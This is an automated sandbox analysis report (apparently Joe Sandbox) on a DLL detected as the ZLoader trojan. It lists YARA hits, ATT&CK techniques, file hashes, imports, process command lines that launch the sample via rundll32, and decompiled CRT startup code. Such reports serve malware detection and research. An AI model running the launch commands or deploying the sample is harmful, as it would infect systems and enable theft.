Source: Yara match	File source: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.612647390.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.4975cf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4975cf4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2755cf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2755cf4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Rundll321	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	System Information Discovery22	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LbSpXJz6Ey.dll	39%	Virustotal		Browse
LbSpXJz6Ey.dll	26%	Metadefender		Browse
LbSpXJz6Ey.dll	45%	ReversingLabs	Win32.Trojan.ZLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://openspot.de	0%	Virustotal		Browse
http://openspot.de	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://openspot.de	loaddll32.exe, 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.661511442.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.613754347.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.658068139.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.610821067.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.628771772.000000006E232000.00000002.00020000.sdmp, LbSpXJz6Ey.dll	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
https	unknown	unknown		unknown	unknown	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	388620
Start date:	16.04.2021
Start time:	05:47:43
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	LbSpXJz6Ey.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winDLL@13/0@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 72% (good quality ratio 69.1%) Quality average: 84% Quality standard deviation: 25.8%
HCA Information:	Successful, ratio: 71% Number of executed functions: 11 Number of non-executed functions: 99
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.597816043066153
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LbSpXJz6Ey.dll
File size:	682496
MD5:	d6904948ae99d7bf84e6af9a978c3ae6
SHA1:	a272ccd04db93604874c8606e4f41ad8bb212540
SHA256:	938f890613dc8526bb828c3de5d5c612b7c13515062fb6ca15f8abc1424f2835
SHA512:	dbae64e1d607c23e5779fcd3da5e8e1f8348d324b68097758d07ca31a7778d5a22ae701d5999d324063095b61c30cc34a8ca2754dc878d4f87e94cbe72f387b6
SSDEEP:	12288:m9D8Diks/1k4R17DVu+PQYgzCNouGhKvuZk8SUxEMPEQIRAkwOBYSk8x3JVBKKZM:mG+kY9IYNouGxTxEnVdB7ku5VZrY
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v..M.A..v....&..v..2....v..2....v..2....v..M.Z..v...v..~w..2...rv..2....v..2.J..v...v"..v..2....v..Rich.v.........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x40a785
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5E85A686 [Thu Apr 2 08:47:02 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	1871ee680e7135cabc1e519d428eefe0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F157C83B6F7h
call 00007F157C83C03Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F157C83B59Ah
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [004740F4h]
push dword ptr [ebp+08h]
call dword ptr [004740F0h]
push C0000409h
call dword ptr [004740DCh]
push eax
call dword ptr [004740F8h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F157C86B905h
test eax, eax
je 00007F157C83B6F7h
push 00000002h
pop ecx
int 29h
mov dword ptr [00482DB8h], eax
mov dword ptr [00482DB4h], ecx
mov dword ptr [00482DB0h], edx
mov dword ptr [00482DACh], ebx
mov dword ptr [00482DA8h], esi
mov dword ptr [00482DA4h], edi
mov word ptr [00482DD0h], ss
mov word ptr [00482DC4h], cs
mov word ptr [00482DA0h], ds
mov word ptr [00482D9Ch], es
mov word ptr [00482D98h], fs
mov word ptr [00482D94h], gs
pushfd
pop dword ptr [00482DC8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00482DBCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00482DC0h], eax

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x80be0	0x94	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x80c74	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa2000	0x226f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc5000	0x2e78	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7ebac	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7ec00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x74000	0x228	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7254c	0x72600	False	0.616280310792	data	6.53537089379	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x74000	0xd8d6	0xda00	False	0.520928899083	data	5.60774438126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x1f820	0xe00	False	0.202566964286	data	2.7624602223	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xa2000	0x226f8	0x22800	False	0.733794723732	data	6.08032786403	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc5000	0x2e78	0x3000	False	0.758463541667	data	6.61511598491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_RCDATA	0xa6ac0	0xcc14	data	English	United States
RT_RCDATA	0xbbee8	0x880e	data	English	United States
RT_RCDATA	0xb36d8	0x880e	data	English	United States
RT_RCDATA	0xa26b8	0x4408	data	English	United States
RT_VERSION	0xa21b0	0x388	data	English	United States
RT_MANIFEST	0xa2538	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, DeleteFileA, ResetEvent, VirtualProtectEx, FindFirstChangeNotificationA, CreateDirectoryA, OutputDebugStringW, WriteConsoleW, CreateFileW, ReadConsoleW, ReadFile, CloseHandle, HeapReAlloc, HeapSize, GetStringTypeW, GetSystemDirectoryA, GetFileSizeEx, SetStdHandle, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, SetConsoleCtrlHandler, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetCurrentThread, SetEvent, OpenMutexA, Sleep, CreateMutexA, DuplicateHandle, GetEnvironmentVariableA, PeekNamedPipe, VirtualAlloc, GetCurrentProcess, VirtualFree, VirtualProtect, SetFilePointerEx, GetShortPathNameA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, DecodePointer
USER32.dll	GetCursorPos, RegisterClassExA, GetWindowTextLengthA, CreateMenu, AppendMenuA, TranslateMessage, SetFocus, DeferWindowPos, UnregisterHotKey, GetFocus, GetClassInfoExA, BeginDeferWindowPos, GetKeyNameTextA, RegisterWindowMessageA, CallWindowProcA, GetWindowLongA
ole32.dll	OleUninitialize, CoInitialize, OleCreate, CoUninitialize, OleInitialize, CoSuspendClassObjects, StgCreateDocfile
COMDLG32.dll	GetSaveFileNameA, CommDlgExtendedError, GetOpenFileNameW, ChooseFontA, GetFileTitleA
COMCTL32.dll	CreateToolbarEx, ImageList_SetOverlayImage, ImageList_Add, DestroyPropertySheetPage, ImageList_LoadImageA

Exports

Name	Ordinal	Address
_Drawmorning@8	1	0x43e540
_ExpectRemember@0	2	0x43d8b0
_Offmark@0	3	0x43d530
_Providesea@8	4	0x43d810

Version Infos

Description	Data
LegalCopyright	2015 Surprise Live Corporation. All rights reserved
InternalName	Sight.dll
FileVersion	0.6.0.987
CompanyName	Surprise Live
Comments	http://openspot.de
ProductName	Surprise Live Season form Eightstone
ProductVersion	0.6.0.987
FileDescription	Season form Eightstone
OriginalFilename	Sight.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6548 Parent PID: 6056

General

Start time:	05:48:32
Start date:	16/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll'
Imagebase:	0x910000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6588 Parent PID: 6548

General

Start time:	05:48:33
Start date:	16/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6624 Parent PID: 6548

General

Start time:	05:48:33
Start date:	16/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Drawmorning@8
Imagebase:	0x210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ZLoader_2, Description: Yara detected ZLoader, Source: 00000004.00000003.583049899.0000000002740000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ZLoader_2, Description: Yara detected ZLoader, Source: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6636 Parent PID: 6588

General

Start time:	05:48:33
Start date:	16/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1
Imagebase:	0x210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ZLoader_2, Description: Yara detected ZLoader, Source: 00000005.00000003.585834648.0000000004960000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ZLoader_2, Description: Yara detected ZLoader, Source: 00000005.00000002.612647390.000000006E191000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6684 Parent PID: 6548

General

Start time:	05:48:37
Start date:	16/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_ExpectRemember@0
Imagebase:	0x210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ZLoader_2, Description: Yara detected ZLoader, Source: 00000006.00000002.647580754.000000006E191000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6708 Parent PID: 6548

General

Start time:	05:48:41
Start date:	16/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Offmark@0
Imagebase:	0x210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6724 Parent PID: 6548

General

Start time:	05:48:45
Start date:	16/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Providesea@8
Imagebase:	0x210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6548 Parent PID: 6056 loaddll32.exeCOMMON

Executed Functions

Function 6E19A596, Relevance: 12.1, APIs: 8, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E19A596(void* __edx) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				E6E19AAE0(0x6e2101b8, 0x10);
				_t34 =  *0x6e212cb4; // 0x1
				if(_t34 > 0) {
					 *0x6e212cb4 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E6E19A102();
					 *(_t80 - 4) = 1;
					__eflags =  *0x6e212c90 - 2;
					if( *0x6e212c90 != 2) {
						E6E19AE86(_t67, 1, _t73, 7);
						asm("int3");
						E6E19AAE0(0x6e2101e0, 0xc);
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E6E19A751( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E6E19A43C(_t60, _t67,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(_t74 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(_t70 == 2) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_t74 = E6E1CD9E0(_t57,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(_t74 == 0) {
											_t45 = E6E1CD9E0(_t57,  *((intOrPtr*)(_t80 + 8)), _t42, _t57);
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E19A596(_t67);
											_pop(_t60);
											E6E19A751( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E6E19A43C(_t60, _t67,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E6E19A751( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x6e212cb4 - _t70; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E6E19A1CD(_t60);
						E6E19B12F();
						E6E19B190();
						 *0x6e212c90 =  *0x6e212c90 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E6E19A62B();
						_t54 = E6E19A36E( *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E6E19A638();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

0x6e19a596
0x6e19a59d
0x6e19a5a2
0x6e19a5a9
0x6e19a5b0
0x6e19a5b8
0x6e19a5bb
0x6e19a5c4
0x6e19a5c7
0x6e19a5ca
0x6e19a5d1
0x6e19a640
0x6e19a645
0x6e19a64d
0x6e19a652
0x6e19a655
0x6e19a657
0x6e19a668
0x6e19a668
0x6e19a66c
0x6e19a66f
0x6e19a67b
0x6e19a67b
0x6e19a688
0x6e19a68a
0x6e19a68d
0x6e19a68f
0x6e19a69a
0x6e19a69f
0x6e19a6a1
0x6e19a6a4
0x6e19a6a6
0x00000000
0x00000000
0x6e19a6a6
0x6e19a671
0x6e19a671
0x6e19a674
0x00000000
0x6e19a676
0x6e19a676
0x6e19a6ac
0x6e19a6b6
0x6e19a6b8
0x6e19a6bb
0x6e19a6be
0x6e19a6c0
0x6e19a6c2
0x6e19a6c9
0x6e19a6ce
0x6e19a6d0
0x6e19a6d0
0x6e19a6d6
0x6e19a6d7
0x6e19a6dc
0x6e19a6e2
0x6e19a6e2
0x6e19a6c2
0x6e19a6e7
0x6e19a6e9
0x6e19a6f0
0x6e19a6fa
0x6e19a6fc
0x6e19a6ff
0x6e19a701
0x6e19a70d
0x6e19a735
0x6e19a735
0x6e19a6eb
0x6e19a6eb
0x6e19a6ee
0x00000000
0x00000000
0x6e19a6ee
0x6e19a6e9
0x6e19a674
0x6e19a738
0x6e19a73f
0x6e19a659
0x6e19a659
0x6e19a65f
0x00000000
0x6e19a661
0x6e19a661
0x6e19a661
0x6e19a65f
0x6e19a744
0x6e19a750
0x6e19a5d3
0x6e19a5d3
0x6e19a5d8
0x6e19a5dd
0x6e19a5e2
0x6e19a5e9
0x6e19a5ed
0x6e19a5f7
0x6e19a603
0x6e19a605
0x6e19a605
0x6e19a607
0x6e19a60a
0x6e19a611
0x6e19a616
0x00000000
0x6e19a616
0x6e19a5ab
0x6e19a5ab
0x6e19a618
0x6e19a61b
0x6e19a627
0x6e19a627

APIs

__RTC_Initialize.LIBCMT ref: 6E19A5DD
___scrt_uninitialize_crt.LIBCMT ref: 6E19A5F7

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: b6fd130dac9b84dd0bc0e75f6168ae3c0eebbd9327c9e14799a0d1dbd346fdc2
Instruction ID: 0a41e703ec688c1a3033260f62525d3b7e5bda0a7c555811e5f26d189866c7e7
Opcode Fuzzy Hash: b6fd130dac9b84dd0bc0e75f6168ae3c0eebbd9327c9e14799a0d1dbd346fdc2
Instruction Fuzzy Hash: ED412772D05614AFDB20CFE4C805BDE7AB9EF91B95F214415F8286B240DB304E89FBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E19A646, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E6E19A646(void* __edx) {
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t44;
				void* _t48;

				_t39 = __edx;
				E6E19AAE0(0x6e2101e0, 0xc);
				_t40 =  *((intOrPtr*)(_t44 + 0xc));
				if(_t40 != 0) {
					L3:
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					if(_t40 == 1 || _t40 == 2) {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						_t42 = E6E19A751( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t42 != 0) {
							_t25 = E6E19A43C(_t36, _t39,  *((intOrPtr*)(_t44 + 8)), _t40, _t34); // executed
							_t42 = _t25;
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								goto L8;
							}
						}
					} else {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						L8:
						_t42 = E6E1CD9E0(_t34,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t40 == 1 && _t42 == 0) {
							_push((E6E1CD9E0(_t34,  *((intOrPtr*)(_t44 + 8)), _t26, _t34) & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
							E6E19A596(_t39);
							_pop(_t36);
							E6E19A751( *((intOrPtr*)(_t44 + 8)), _t42, _t34);
						}
						if(_t40 == 0 || _t40 == 3) {
							_t42 = E6E19A43C(_t36, _t39,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								_t42 = E6E19A751( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
								 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							}
						}
					}
					 *(_t44 - 4) = 0xfffffffe;
					_t24 = _t42;
				} else {
					_t48 =  *0x6e212cb4 - _t40; // 0x1
					if(_t48 > 0) {
						goto L3;
					} else {
						_t24 = 0;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
				return _t24;
			}

0x6e19a646
0x6e19a64d
0x6e19a652
0x6e19a657
0x6e19a668
0x6e19a668
0x6e19a66f
0x6e19a67b
0x6e19a688
0x6e19a68a
0x6e19a68f
0x6e19a69a
0x6e19a69f
0x6e19a6a1
0x6e19a6a6
0x00000000
0x00000000
0x6e19a6a6
0x6e19a676
0x6e19a676
0x6e19a6ac
0x6e19a6b6
0x6e19a6b8
0x6e19a6be
0x6e19a6d6
0x6e19a6d7
0x6e19a6dc
0x6e19a6e2
0x6e19a6e2
0x6e19a6e9
0x6e19a6fa
0x6e19a6fc
0x6e19a701
0x6e19a70d
0x6e19a735
0x6e19a735
0x6e19a701
0x6e19a6e9
0x6e19a738
0x6e19a73f
0x6e19a659
0x6e19a659
0x6e19a65f
0x00000000
0x6e19a661
0x6e19a661
0x6e19a661
0x6e19a65f
0x6e19a744
0x6e19a750

APIs

dllmain_raw.LIBCMT ref: 6E19A683
dllmain_crt_dispatch.LIBCMT ref: 6E19A69A
dllmain_raw.LIBCMT ref: 6E19A6E2
dllmain_crt_dispatch.LIBCMT ref: 6E19A6F5
dllmain_raw.LIBCMT ref: 6E19A708

Memory Dump Source

